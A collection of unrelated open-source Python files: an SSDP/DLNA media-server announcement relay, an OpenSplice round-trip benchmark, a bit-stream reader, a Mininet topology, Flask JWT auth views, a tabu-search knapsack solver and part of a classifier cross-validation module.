osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, mreq)
imsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
imsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
imsock.bind(('', DLNA_PORT))
mreq = struct.pack("4sl", socket.inet_aton(DLNA_GRP), socket.INADDR_ANY)
imsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def _send_announcements(first_line, type_header, skip_label, addr, port):
    # Build and send the six SSDP announcements for this media server.
    # NOTIFY messages carry the type in NT:, search responses carry it in ST:.
    if URL != '' and UUID != '' and not LISTEN:
        for dev_type in ['urn:schemas-upnp-org:device:MediaServer:1',
                         'upnp:rootdevice',
                         'uuid:' + UUID,
                         'urn:schemas-upnp-org:service:ContentDirectory:1',
                         'urn:schemas-upnp-org:service:ConnectionManager:1',
                         'urn:schemas-upnp-org:service:X_MS_MediaReceiverRegistrar:1']:
            # The bare uuid announcement uses the uuid itself as the USN;
            # all others append the device/service type.
            if dev_type.startswith('uuid:'):
                usn = dev_type
            else:
                usn = 'uuid:' + UUID + '::' + dev_type
            msg = first_line + CRLF \
                + type_header + ': ' + dev_type + CRLF \
                + 'USN: ' + usn + CRLF \
                + 'NTS: ssdp:alive' + CRLF \
                + 'LOCATION: ' + URL + CRLF \
                + 'HOST: 239.255.255.250:1900' + CRLF \
                + 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
                + 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
                + CRLF
            print "Sending ("+addr+":"+str(port)+"): \n" + msg
            osock.sendto(msg, (addr, port))
    else:
        print "Skipping " + skip_label
def notify(addr, port):
    # Multicast NOTIFY announcements (NT: header)
    _send_announcements('NOTIFY * HTTP/1.1', 'NT', 'notification', addr, port)
def respond(addr, port):
    # Unicast M-SEARCH responses (ST: header)
    _send_announcements('HTTP/1.1 200 OK', 'ST', 'response', addr, port)
def server():
if not LISTEN:
msg = ('M-SEARCH * HTTP/1.1' + CRLF \
+ 'Host: %s:%d' + CRLF \
+ 'Man: "ssdp:discover"' + CRLF \
+ 'ST: upnp:rootdevice' + CRLF \
+ 'MX: 3' + CRLF \
+ 'User-Agent:ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ CRLF) % (SERVER, DLNA_PORT)
print "Sending to server: \n" + msg
osock.sendto(msg, (SERVER, DLNA_PORT))
def parse_msg(msg):
global URL, UUID, last_update, next_notification
if (re.match('^HTTP/1.1\s*200\s*OK', msg, re.IGNORECASE)):
# Response to our M-SEARCH
match = re.search(r'^LOCATION:\s*(.*)\r$', msg, re.IGNORECASE | re.MULTILINE)
if match:
URL = match.group(1)
match = re.search(r'^USN:\s*uuid:([^:]+):', msg, re.IGNORECASE | re.MULTILINE)
if match:
UUID = match.group(1)
print 'URL=%s, UUID=%s.' % (URL, UUID)
last_update = time.time()
# Bring the notifcation forward
next_notification = time.time() + 1
def is_search(msg):
return re.match('^M-SEARCH', msg, re.IGNORECASE)
# Get info from server
last_update = 0
server()
next_notification = time.time() + INTERVAL
# Note: the port is not set up until at least one send has happened
(notused, oport) = osock.getsockname()
isock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
isock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
isock.bind(('', oport))
while True:
(readyin, notused, notused) = select.select([isock, imsock], [], [], max(next_notification - time.time(),0))
if (isock in readyin):
(msg, (addr, port)) = isock.recvfrom(4096)
print "Received unicast from %s:%d\n%s" % (addr, port, msg)
if (is_search(msg)):
respond(addr, port)
else:
parse_msg(msg)
if (imsock in readyin):
(msg, (addr, port)) = imsock.recvfrom(4096)
if (port == oport):
print "Ignored multicast from ourselves (%s:%d)" % (addr, port)
else:
print "Received multicast from %s:%d\n%s" % (addr, port, msg)
if (is_search(msg)):
respond(addr, port)
if (time.time() >= next_notification):
next_notification = time.time() + INTERVAL
# Has the server info been updated recently?
if (time.time() - last_update <= INTERVAL):
# Yes, just do the notification
notify(DLNA_GRP, DLNA_PORT)
else:
# Get new info from the server
server()
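# For reference, a typical discovery request this loop answers looks like the
# sketch below (ST and MX values vary by client):
#   M-SEARCH * HTTP/1.1
#   HOST: 239.255.255.250:1900
#   MAN: "ssdp:discover"
#   ST: urn:schemas-upnp-org:device:MediaServer:1
#   MX: 2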

# ==== File: osrf/opensplice :: examples/dcps/PerformanceScripts/Roundtrip.py (license: apache-2.0) ====
import utils, os, sys, csv, subprocess, time, optparse, pdb
def pingpong(o):
texec = []
ping = 'ping'
pong = 'pong'
if sys.platform == 'win32':
ping = 'ping.exe'
pong = 'pong.exe'
apiselect=0
if o.capi:
#C
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + pong)
texec[apiselect].append('C')
apiselect+=1
if o.cppapi:
#SACPP
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + pong)
texec[apiselect].append('SACPP')
apiselect+=1
if o.isoapi:
#ISOCPP
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + pong)
texec[apiselect].append('ISOCPP')
apiselect+=1
''' Create or append to total averages file '''
tafcsv = utils.getCSV(o.averagesfile)
#Create nested dictionary
results = utils.tree()
for i in texec:
resultsApi = results[i[2]]
#1KB
Bsize = 1000
try:
if o.pongonly:
pong = subprocess.Popen([i[1]],stdout=subprocess.PIPE, stderr=subprocess.PIPE)
utils.setPriority(pong.pid, o.pongnice, o.pongaffinity)
if o.pongonly and not o.pingonly:
#Run for 10 minutes and exit program
time.sleep(600)
sys.exit(0)
time.sleep(1)
''' Set the CSV output file (af) '''
csvfile = i[0] + ".csv"
cw = utils.getCSV(csvfile)
cw.writerow([str(time.strftime("%x %H:%M:%S"))])
try:
while(Bsize <= (o.maxpayload * 1000)):
resultsBsize = resultsApi[int(Bsize)]
print "launching " + i[0] + "with args:" + str(Bsize) + " " + str(o.samples) + " " + str(o.seconds)
cw.writerow([str(Bsize/1000)+"KB"])
cw.writerow(['Seconds'] + ['RT Count'] + ['RT median'] + ['RT min'] +
['W Count'] + ['W median'] + ['W min'] +
['R Count'] + ['R mean'] + ['R min']);
try:
if o.pingonly:
ping = subprocess.Popen( [i[0], str(Bsize), str(o.samples), str(o.seconds) ],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
utils.setPriority(ping.pid, o.pingnice, o.pingaffinity)
except OSError:
print "Cannot find ping executable: " + str([i[0]])
#Wait for ping to terminate
ping.wait()
for line in ping.stderr:
print 'err: ' + line
for line in ping.stdout:
utils.parseRT(line,resultsBsize)
for key in sorted(resultsBsize):
k = resultsBsize[key]
cw.writerow([key] +
[k['RoundTrip']['Count']] + [k['RoundTrip']['Median']] + [k['RoundTrip']['Min']] +
[k['Read']['Count']] + [k['Read']['Median']] + [k['Read']['Min']] +
[k['Write']['Count']] + [k['Write']['Median']] + [k['Write']['Min']])
Bsize = Bsize*2
except OSError:
print "Cannot find ping executable: " + [i[0]]
finally:
if o.pongonly:
#Quit pong
pingq = subprocess.Popen( [i[0], 'quit' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pingq.wait()
for line in zip(pingq.stdout, pingq.stderr):
print line
pong.terminate()
except OSError:
print "Cannot find pong executable: " + str([i[1]])
tafcsv.writerow([str(time.strftime("%x %H:%M:%S"))])
tafcsv.writerow(['Payload KB'] + ['RoundTrip C'] + ['RoundTrip SACPP'] + ['RoundTip ISOCPP']
+ ['Read C'] + ['Read SACPP'] + ['Read ISOCPP']
+ ['Write C'] + ['Write SACPP'] + ['Write ISOCPP'])
Bsize = 1000
while Bsize <= (o.maxpayload * 1000):
KB = Bsize/1000
#pdb.set_trace()
tafcsv.writerow([KB] + utils.is_empty(results['C'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['C'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['C'][Bsize]['Overall']['Write']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['Write']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Write']['Median']))
Bsize = Bsize*2
def main():
parser = optparse.OptionParser()
parser.add_option("-C", "--capi", dest="capi",
help="Run C API Roundtrip",
action="store_true",
default=False)
parser.add_option("-S", "--sacppapi", dest="cppapi",
help="Run SACPP API Roundtrip",
action="store_true",
default=False)
parser.add_option("-I", "--isocppapi", dest="isoapi",
help="Run ISOCPP API Roundtrip",
action="store_true",
default=False)
parser.add_option("-o", "--output", dest="averagesfile",
help=("Optional path and filename for a overall average payload and API size by"
"default this is stored in the current working directory"),
default="averages.csv")
parser.add_option("", "--pingonly", dest="pingonly",
help="Only create the ping daemon",
action="store_true",
default=False)
parser.add_option("", "--pongonly", dest="pongonly",
help="Only create the pong daemon",
action="store_true",
default=False)
pingopt = optparse.OptionGroup(parser, "Ping options",
"Change arguments for ping, run time in seconds, number of samples and maxpayload")
pingopt.add_option("", "--seconds", type="int", dest="seconds",
help="The number of seconds ping should execute for, the default is 10",
default=10)
pingopt.add_option("", "--samples", type="int", dest="samples",
help="The number of samples ping should send, the default is infinite",
default=0)
pingopt.add_option("", "--maxpayload", type="int", dest="maxpayload",
help="The max payload in kB, the default is 64",
default=64)
parser.add_option_group(pingopt)
cpuopt = optparse.OptionGroup(parser, "CPU and priority options",
"Allow the setting of NICE and CPU affinity")
cpuopt.add_option("", "--pingaffinity", type="int", dest="pingaffinity",
help="Set the CPU affinity for the ping process, the default is cpu 1",
default=1)
cpuopt.add_option("", "--pongaffinity", type="int", dest="pongaffinity",
help="Set the CPU affinity for the pong process, the default is cpu 0",
default=0)
cpuopt.add_option("", "--pingnice", type="int", dest="pingnice",
help="Set the nice value for the ping process, the default is -20. NOTE: This option is available on Linux only, Windows will run under REALTIME_PRIORITY_CLASS",
default=-20)
cpuopt.add_option("", "--pongnice", type="int", dest="pongnice",
help="Set the nice value for the pong process, the default is -20. NOTE: This option is available on Linux only, Windows will run under REALTIME_PRIORITY_CLASS",
default=-20)
parser.add_option_group(cpuopt)
(options, args) = parser.parse_args()
if(not options.capi and not options.cppapi and not options.isoapi):
#Nothing was set, run them all
options.capi = True
options.cppapi = True
options.isoapi = True
if not options.pingonly and not options.pongonly:
#Ping and pong (default)
options.pingonly = True
options.pongonly = True
pingpong(options)
if __name__ == "__main__":
main()
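
# Example invocations (sketch; the flags are those defined in main() above):
#   python Roundtrip.py --isocppapi --seconds 30 --maxpayload 16
#   python Roundtrip.py --pongonly                 # run only the pong daemon
#   python Roundtrip.py --pingaffinity 2 --pingnice -10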

# ==== File: alephu5/Soundbyte :: IO/datalistener.py (license: gpl-3.0) ====
#! ../environment/bin/python3.3
import argparse
import tempfile
import os
from itertools import tee
from binascii import hexlify
def main():
parser = argparse.ArgumentParser(description = 'Reads binary data from a file')
parser.add_argument('-f, --file',
type = str,
default = '/dev/dsp',
help = 'Specifies file to read.',
dest = 'datasource')
parser.add_argument('-b, --bytesize',
type = int,
default = None,
help = 'Specifies number of bytes to read.',
dest = 'bytesize')
parser.add_argument('-d, --debias',
default = False,
const = True,
action = 'store_const',
help = 'Uses Von Neumann algorithm to balance numbers of 1s and 0s',
dest = 'debias')
parser.add_argument('-t, --temp',
default = '/tmp',
help = 'Give a prefix destination for storing temporary files',
dest = 'temp')
opts = parser.parse_args()
BitSource = DataStream(opts.datasource)
print(BitSource.getBinary(opts.bytesize, opts.debias, opts.temp))
def VNdebias(binary, temp):
debfile = tempfile.TemporaryFile(mode='a+', prefix = temp)
while True:
bits = binary.read(2)
try:
if bits[0] != bits[1]:
debfile.write(bits[1])
except(IndexError):
break
debfile.seek(0)
return debfile.read()
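
# Worked example of the Von Neumann extractor above: only unequal bit pairs
# emit a bit (their second one), so the input "01101100" - read as the pairs
# (01)(10)(11)(00) - yields "10"; equal pairs are discarded, which removes
# bias at the cost of throughput.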
class DataStream:
def __init__(self, datasource):
self.datasource = datasource
def getBytes(self, bytesize):
with open(self.datasource,'rb') as bitSource:
return bitSource.read(bytesize)
def getInts(self, bytesize):
sourcebytes = self.getBytes(bytesize)
return sourcebytes
def getBinary(self, bytesize, debias, temp):
binfile = tempfile.TemporaryFile(mode='w+', prefix=temp)
for bit in self.getInts(bytesize):
binfile.write(format(bit,'08b'))
binfile.seek(0)
if debias == False:
return binfile.read()
else:
return VNdebias(binfile, temp)
if __name__ == "__main__":
main()

# ==== File: pierce-m/p4factory :: mininet/swl_l2.py (license: apache-2.0) ====
#!/usr/bin/python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
# Topology with two switches and two hosts (static macs, no loops, no STP)
#
# 172.16.10.0/24
# h1 ------------------- sw1 ------------------ sw2------- -------------h2
# .1 .2
##############################################################################
from mininet.net import Mininet, VERSION
from mininet.log import setLogLevel, info
from mininet.cli import CLI
from distutils.version import StrictVersion
from p4_mininet import P4DockerSwitch
def main():
net = Mininet( controller = None )
# add hosts
h1 = net.addHost( 'h1', ip = '172.16.10.1/24' )
h2 = net.addHost( 'h2', ip = '172.16.10.2/24' )
# add switch 1
sw1 = net.addSwitch( 'sw1', target_name = "p4dockerswitch",
cls = P4DockerSwitch, config_fs = 'configs/sw1/l2',
pcap_dump = True )
# add switch 2
sw2 = net.addSwitch( 'sw2', target_name = "p4dockerswitch",
cls = P4DockerSwitch, config_fs = 'configs/sw2/l2',
pcap_dump = True )
# add links
if StrictVersion(VERSION) <= StrictVersion('2.2.0') :
net.addLink( sw1, h1, port1 = 1 )
net.addLink( sw1, sw2, port1 = 2, port2 = 2 )
net.addLink( sw2, h2, port1 = 1 )
else:
net.addLink( sw1, h1, port1 = 1, fast=False )
net.addLink( sw1, sw2, port1 = 2, port2 = 2, fast=False )
net.addLink( sw2, h2, port1 = 1, fast=False )
net.start()
CLI( net )
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
main()
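
# Example run (sketch; mininet requires root and the p4dockerswitch image):
#   sudo python swl_l2.py
#   mininet> h1 ping h2     # traffic crosses sw1 port 2 <-> sw2 port 2
#   mininet> exit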

# ==== File: rohitdatta/pepper :: pepper/innovation/views.py (license: agpl-3.0) ====
import validators
import jwt
import datetime
import urllib
from flask import request, jsonify, redirect, url_for, flash
from flask_login import current_user, login_required
from pepper import settings
from pepper.utils import get_default_dashboard_for_role
# sends an access token to the callback provided by the url
@login_required
def auth():
app_id = request.args.get('app_id')
callback = request.args.get('callback')
if app_id != settings.INNOVATION_PORTAL_KEY:
return jsonify({'error': 'Invalid app_id provided'}), 422
elif callback is None or not validators.url(callback):
return jsonify({'error': 'Invalid callback provided'}), 422
elif current_user.status == 'NEW':
flash('You must finish registering before starting the puzzle challenge', 'warning')
return redirect(url_for(get_default_dashboard_for_role()))
else:
access_token = {'t': jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=120),
'id': current_user.id, 'fname': current_user.fname, 'lname': current_user.lname}, settings.TOKEN_SEED, algorithm='HS256')}
return redirect(callback + "?" + urllib.urlencode(access_token))
# returns the current user's full name and database id
def get_user_info():
app_id = request.args.get('app_id')
access_token = request.args.get('t') #token
if app_id != settings.INNOVATION_PORTAL_KEY:
return jsonify({'error': 'Invalid app_id provided'}), 422
try:
decoded = jwt.decode(access_token, settings.TOKEN_SEED, algorithms=['HS256'])
return jsonify({'fname': decoded['fname'], 'lname': decoded['lname'], 'id': decoded['id']})
    except jwt.ExpiredSignatureError:
        return jsonify({'error': 'Token expired'}), 422
    # catch the more specific errors before the generic InvalidTokenError;
    # in PyJWT, InvalidSignatureError and DecodeError subclass InvalidTokenError,
    # so they must come first or their handlers are unreachable
    except jwt.InvalidSignatureError:
        return jsonify({'error': 'Token has invalid signature'}), 422
    except jwt.DecodeError:
        return jsonify({'error': 'Token cannot be decoded'}), 422
    except jwt.InvalidTokenError:
        return jsonify({'error': 'Token validation failed'}), 422
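
# Hedged sketch of the round trip implemented above (the URL paths are an
# assumption; only the query parameters come from the code):
#   GET <auth route>?app_id=<INNOVATION_PORTAL_KEY>&callback=https://portal.example/cb
#     -> 302 to https://portal.example/cb?t=<jwt valid for 120 seconds>
#   GET <user info route>?app_id=<INNOVATION_PORTAL_KEY>&t=<jwt>
#     -> {"fname": ..., "lname": ..., "id": ...}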

# ==== File: marcoscastro/mochila_inteiro-busca_tabu :: mochila_tabu.py ====
# -*- coding:utf-8 -*-
# Author: Marcos Castro
# Tabu Search - Integer Knapsack Problem
# Knapsack configuration:
# Object (j)    1 2 3 4 5
# Weight (wj)   4 5 7 9 6
# Benefit (pj)  2 2 3 4 4
# Goal: maximize the total benefit of the knapsack
# Objective function: f(s) = SUM[j=1..n](pj)(sj) - SUM[j=1..n](pj)(sj) * max{0, SUM[j=1..n](wj)(sj) - b}
# Simplified objective function: f(s) = SUM[j=1..n](pj)(sj) * [1 - max{0, SUM[j=1..n](wj)(sj) - b}]
# Neighborhood function: flip a single bit (this is how the neighbors are generated)
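
# Worked example with the knapsack configured below (b = 23): the all-ones
# solution s = [1,1,1,1,1] weighs 4+5+7+9+6 = 31 and has benefit 15, so
# f(s) = 15 * (1 - max(0, 31 - 23)) = 15 * (1 - 8) = -105 (heavily penalized),
# while s = [1,1,1,0,1] weighs 22 <= 23 and scores f(s) = 2+2+3+4 = 11.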
# function to get the weight of a given solution
# this function computes the weight summation
# takes a solution and the knapsack
def obter_peso(solucao, mochila):
    peso = 0
    for i in range(0, len(solucao)):
        peso += solucao[i] * mochila[i][0]
    return peso
# function that computes the value of the objective function
# takes a solution, the knapsack and the maximum capacity of the knapsack
def obter_avaliacao(solucao, mochila, capacidade_maxima):
    somatorio_peso = 0
    somatorio_beneficio = 0
    for i in range(0, len(solucao)):
        somatorio_peso += solucao[i] * mochila[i][0]  # mochila[i][0] accesses the weight
        somatorio_beneficio += solucao[i] * mochila[i][1]  # mochila[i][1] accesses the benefit
    avaliacao = somatorio_beneficio * (1 - max(0, somatorio_peso - capacidade_maxima))
    return avaliacao
# function to generate the neighbors; the neighborhood is generated by flipping one bit
# melhor_solucao - current best solution
# max_vizinhos - maximum number of neighbors
def gerar_vizinhos(melhor_solucao, max_vizinhos):
    vizinhos = []
    pos = 0
    for i in range(0, max_vizinhos):
        vizinho = []
        for j in range(0, len(melhor_solucao)):
            if j == pos:
                if melhor_solucao[j] == 0:
                    vizinho.append(1)
                else:
                    vizinho.append(0)
            else:
                vizinho.append(melhor_solucao[j])
        vizinhos.append(vizinho)
        pos += 1
    return vizinhos
# function to get the evaluation value of each neighbor
# vizinhos - list of all neighbors
# mochila - the knapsack
# capacidade_maxima - maximum capacity of the knapsack
# max_vizinhos - maximum number of neighbors
def obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos):
    vizinhos_avaliacao = []
    for i in range(0, max_vizinhos):
        vizinhos_avaliacao.append(obter_avaliacao(vizinhos[i], mochila, capacidade_maxima))
    return vizinhos_avaliacao
# function to get the modified bit
# melhor_solucao - current best solution
# melhor_vizinho - best neighbor
def obter_bit_modificado(melhor_solucao, melhor_vizinho):
    for i in range(0, len(melhor_solucao)):
        if melhor_solucao[i] != melhor_vizinho[i]:
            return i
# function to get the neighbor with the highest evaluation
# vizinhos_avaliacao - evaluation value of every neighbor
# lista_tabu - tabu list used to forbid a particular bit flip
# melhor_solucao - current best solution
# vizinhos - list of all neighbors
def obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos):
    maxima_avaliacao = max(vizinhos_avaliacao)
    pos = 0
    bit_proibido = -1
    # check whether the tabu list has any elements
    if len(lista_tabu) != 0:
        # if it does, there is a forbidden bit, so grab it
        bit_proibido = lista_tabu[0]
    # loop to find the position of the best neighbor
    for i in range(0, len(vizinhos_avaliacao)):
        if vizinhos_avaliacao[i] == maxima_avaliacao:
            pos = i
            break
    # check whether this neighbor results from a forbidden move
    if bit_proibido != -1:
        # if so, get the position of the bit flipped to generate this neighbor
        bit_pos = obter_bit_modificado(melhor_solucao, vizinhos[pos])
        # check whether that bit is in the tabu list (compare with bit_proibido)
        if bit_pos == bit_proibido:
            # if we get here, look for the second-best neighbor
            melhor_pos = 0
            for i in range(1, len(vizinhos_avaliacao)):
                if i != bit_pos:
                    if vizinhos_avaliacao[i] > vizinhos_avaliacao[melhor_pos]:
                        melhor_pos = i
            return melhor_pos  # return the position of the second-best neighbor
    return pos  # return the position of the best neighbor
# knapsack configuration as a list of lists
# the first value is the weight and the second is the benefit
mochila = [[4,2], [5,2], [7,3], [9,4], [6,4]]
iteracao = melhor_iteracao = 0
melhor_solucao = []  # will hold the best solution
lista_tabu = []  # tabu list, initially empty
capacidade_maxima = 23  # maximum capacity of the knapsack
bt_max = 1  # maximum number of iterations without improvement of the best solution value
max_vizinhos = 5  # maximum number of neighbors
# PASSO 0
# gera uma solução inicial aleatória
import random # módulo para gerar números randômicos
# o for abaixo gera 5 vezes os números: 0 ou 1
for i in range(0, 5):
bit = random.randrange(2) # gera números de 0 (inclusive) a 1 (inclusive)
melhor_solucao.append(bit) # adiciona o bit na lista
# mostra a solução inicial e o seu valor de avaliação
print('Solução inicial: {0}, Avaliação: {1}'.format(melhor_solucao, obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))
# obtém o peso corrente da mochila
peso_corrente = obter_peso(melhor_solucao, mochila)
# obtém a avaliação da melhor_solucao
melhor_avaliacao = obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)
# gera os vizinhos (vizinhança)
vizinhos = gerar_vizinhos(melhor_solucao, max_vizinhos)
# calcula a avaliação de todos os vizinhos
vizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos)
# obtém a posição do melhor vizinho
pos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)
# verifica se o melhor vizinho tem avaliação melhor do que a melhor avaliação até o momento
if vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:
# obtém o bit que foi modificado do melhor vizinho
bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])
lista_tabu.append(bit_modificado) # guarda o movimento proibido
melhor_solucao = vizinhos[pos_melhor_vizinho][:] # temos uma solução melhor, faz uma cópia
melhor_iteracao += 1 # incrementa a iteração onde foi achada a melhor solução até o momento
iteracao += 1 # incrementa iteração
# Aqui terminou o PASSO 0, agora iremos entrar em loop (executar os outros passos)
while True:
# a condição de parada é se a diferença da iteração e melhor_iteracao for maior que bt_max
# iteracao é a iteração global (sempre é incrementada)
# melhor_iteracao é a iteração onde se achou a melhor solução (nem sempre é incrementada)
# bt_max é o máximo de iterações sem melhora no valor da melhor solução
if (iteracao - melhor_iteracao) > bt_max:
break
# abaixo temos linhas de código quase idêntico ao PASSO 0
# gerando novos vizinhos, faz uma cópia dos novos vizinhos
vizinhos = gerar_vizinhos(melhor_solucao, max_vizinhos)[:]
# obtém o valor de avaliação de todos os vizinhos (faz uma cópia)
vizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos)[:]
# obtém a posição do melhor vizinho
pos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)
# verifica se o melhor vizinho tem avaliação melhor do que a melhor avaliação corrente
if vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:
# obtém o bit que foi modificado para gerar o melhor vizinho
bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])
lista_tabu[0] = bit_modificado # guarda o movimento proibido (Essa linha NÃO existia no Passo 0)
melhor_solucao = vizinhos[pos_melhor_vizinho][:] # temos uma solução melhor, faz uma cópia da lista
melhor_avaliacao = vizinhos_avaliacao[pos_melhor_vizinho] # atualiza a melhor avaliação
melhor_iteracao += 1 # incrementa a iteração onde foi achada a melhor solução (nem sempre é incrementada)
iteracao += 1 # incremento da iteração (sempre é incrementada)
# mostra a solução final e sua avaliação
print('Solução final: {0}, Avaliação: {1}'.format(melhor_solucao, obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))
print('Melhor iteração: {0}'.format(melhor_iteracao)) # mostra a iteração onde foi achada a melhor solução
print('Iteração: {0}'.format(iteracao)) # mostra a iteração global
| gpl-2.0 | 4,742,286,044,789,534,000 | 45.264045 | 129 | 0.743048 | false | 2.18609 | false | false | false |
krasch/smart-assistants | evaluation/experiment.py | 1 | 12058 | # -*- coding: UTF-8 -*-
"""
This module defines an evaluation framework for performing cross-validation experiments with the implemented classifiers.
"""
from datetime import datetime
from math import sqrt
from sklearn.cross_validation import KFold
from scipy import stats as scipy_stats
import pandas
import numpy
from evaluation import plot
from evaluation.metrics import QualityMetricsCalculator, runtime_metrics, quality_metrics
calculated_stats = ["Mean", "Std deviation", "Confidence interval"]
def delta_in_ms(delta):
"""
Convert a timedelta object to milliseconds.
"""
return delta.seconds*1000.0+delta.microseconds/1000.0
def confidence_interval(data, alpha=0.1):
"""
Calculate the confidence interval for each column in a pandas dataframe.
@param data: A pandas dataframe with one or several columns.
@param alpha: The confidence level, by default the 90% confidence interval is calculated.
@return: A series where each entry contains the confidence-interval for the corresponding column.
"""
alpha = 0.1
t = lambda column: scipy_stats.t.isf(alpha/2.0, len(column)-1)
width = lambda column: t(column) * numpy.std(column.values, ddof=1)/sqrt(len(column))
formatted_interval = lambda column: "%.2f +/- %.4f" % (column.mean(), width(column))
return pandas.Series([formatted_interval(data[c]) for c in data.columns], index=data.columns)
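
# Minimal usage sketch (hypothetical numbers, assuming the imports above):
#   df = pandas.DataFrame({"Precision": [0.71, 0.69, 0.74, 0.70]})
#   confidence_interval(df)["Precision"]  # -> roughly "0.71 +/- 0.0254"
# (90% interval by default; pass alpha=0.05 for a 95% interval)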

class Experiment:
    """
    Class for performing cross-validation of several classifiers on one dataset.
    """

    def __init__(self, dataset):
        self.dataset = dataset
        self.classifiers = []

    def add_classifier(self, cls, name=None):
        if not name is None:
            cls.name = name
        self.classifiers.append(cls)

    def run_with_classifier(self, cls, data_for_folds):
        """
        Perform cross-validation with one classifier.

        @param data_for_folds: Contains one list of True/False values for each of the folds to be run. Each list states
        for every item of the dataset, whether the item is in the current fold part of the training dataset or the
        test dataset.
        @param cls: Classifier to use in the experiment.
        @return: Measurements for quality and runtime metrics.
        """
        runtimes = []
        quality = []
        for train, test in data_for_folds:
            #get the training and testing data for this fold
            data_train, data_test = self.dataset.data[train], self.dataset.data[test]
            target_train, target_test = self.dataset.target[train], self.dataset.target[test]

            #perform training
            train_time = datetime.now()
            cls = cls.fit(data_train, target_train)
            train_time = delta_in_ms(datetime.now()-train_time)

            #apply the classifier on the test data
            test_time = datetime.now()
            recommendations = cls.predict(data_test)
            test_time = delta_in_ms(datetime.now()-test_time)

            #add measurements for this replication to result collection
            runtimes.append({"Training time": train_time,
                             "Overall testing time": test_time,
                             "Individual testing time": test_time/float(len(data_test))})
            quality.append(QualityMetricsCalculator(target_test, recommendations).calculate())

        #calculate statistics over all replications
        return self.calculate_quality_stats(cls.name, quality), self.calculate_runtime_stats(cls.name, runtimes)

    def run(self, folds=10):
        """
        Run the experiment with all classifiers.

        @param folds: How many folds to run, perform 10-fold cross validation by default. folds must be >=2
        @return A `Results` object that can be used to print and plot experiment results.
        """
        assert(folds >= 2)
        #divide the data into the specified number of folds
        data_for_folds = KFold(len(self.dataset.data), n_folds=folds, indices=False)
        #run all of the classifiers and collect quality and runtime statistics
        stats = [self.run_with_classifier(cls, data_for_folds) for cls in self.classifiers]
        #group all quality stats in one big matrix, all runtime stats in another matrix
        quality_stats = pandas.concat([quality for quality, runtime in stats], axis=1)
        runtime_stats = pandas.concat([runtime for quality, runtime in stats])
        return Results(self.classifiers, quality_stats, runtime_stats)

    @staticmethod
    def calculate_quality_stats(cls_name, collected_measurements):
        #make a big matrix of all collected measurements over all replications and group according to the cutoff
        m = pandas.concat(collected_measurements)
        grouped = m.groupby(m.index)
        #calculate stats and rename columns to include name of the statistic and classifier,
        #e.g. Precision -> (Naive Bayes, Precision, Mean)
        map_column_names = lambda stat: {metric: (cls_name, metric, stat) for metric in quality_metrics}
        means = grouped.mean().rename(columns=map_column_names("Mean"))
        std = grouped.std().rename(columns=map_column_names("Std deviation"))
        conf = grouped.apply(confidence_interval).rename(columns=map_column_names("Confidence interval"))
        return pandas.concat([means, std, conf], axis=1)

    @staticmethod
    def calculate_runtime_stats(cls_name, collected_measurements):
        #make a big matrix of all collected measurements over all replications, no need to group anything here
